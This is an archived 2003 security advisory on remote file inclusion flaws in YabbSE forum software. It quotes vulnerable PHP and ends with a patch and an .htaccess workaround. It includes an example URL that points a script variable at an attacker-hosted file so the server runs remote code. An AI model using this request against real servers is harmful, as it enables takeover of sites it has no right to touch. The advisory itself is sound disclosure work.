TUCoPS :: Web BBS :: Frequently Exploited :: web5946.htm

YabbSE remote code execution
23th Jan 2003 [SBWID-5946]
COMMAND

	YabbSE remote code execution

SYSTEMS AFFECTED

	YabbSE versions prior to 1.5.0

PROBLEM

	Mindwarper [mindwarper@hush.com] says :
	
	YabbSE keeps all  of  it's  function  includes  in  a  directory  called
	"Sources" which is not protected. Inside this directory  a  file  called
	Packages.php exists. This file  is  supposed  to  be  included  and  not
	called directly, but if an attacker calls it directly he/she  may  cause
	the script to run remote arbitrary code. Bellow  are  a  couple  of  the
	first lines in Packages.php:
	
	********
	..
	
	global $adminplver;
	$Packagesphpver="YaBB SE 1.4.1";
	
	$safe_mode = ini_get("safe_mode");
		
	$pacmanver = "1.4.1";
	
	include_once("$sourcedir/Packer.php");
	
	
	..
	
	********
	
	We can see here that  the  variable  $sourcedir  is  never  defined  and
	therefore may be defined through global injection.
	
	 Example:
	
	 http://victim/yabbse/Sources/Packages.php?sourcedir=http://attacker/
	
	
	where the attacker server has a file called Packer.php. An attacker  may
	execute remote code on the server with webserver permissions.
	
	Side-note: An attacker may also use this file  for  XSS  attack  on  the
	server.
	
	 Update (25 January 2003)
	 ======
	
	Mindwarpe adds :
	
	YabbSE contains a file called  News.php  which  is  found  in  the  root
	directory. For some unkown reason the vendor did  not  place  this  file
	inside /Sources even though this file is only intended to be used as  an
	include. An attacker can combine his own server with the victim in  such
	way that it would allow him/her to inlcude remote arbitrary code on  the
	victim's server and run it with webserver permissions.
	
	The attack works as following:
	
	********
	..
	
	$dbcon = mysql_connect($db_server,$db_user,$db_passwd);
	mysql_select_db ($db_name);
	
	..
	
	********
	
	First of all we can see  News.php  is  trying  to  connect  to  the  sql
	database. We can see that the variables above that contain the  database
	information are not defined and may be changed by the attacker.  If  the
	attacker installs  yabbse  on  his/her  server  and  allows  remote  sql
	connection, then News.php  will  think  the  database  has  been  loaded
	successfully and run the following lines:
	
	********
	..
	
		if ($template == null)
			include("news_template.php");
		else
		{
			if ($ext == null)
				include($template.".php");
			else
				include($template.".".$ext);
		}
	
	..
	
	********
	
	Since template is never defined before, the  attacker  may  inject  into
	$template his/her own remote file. News.php will include the  attacker's
	code and run it on the server and  give  the  attacker  the  ability  to
	execute arbitrary code on the server with webserver permissions.

SOLUTION

	Get patch from http://www.yabbse.org
	
	 Workaround
	 ==========
	
	As a temporary solution, create a .htaccess  file  that  contains  'Deny
	from all'. Place it in the /Sources/ directory  and  that  should  block
	remote users from accessing it.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH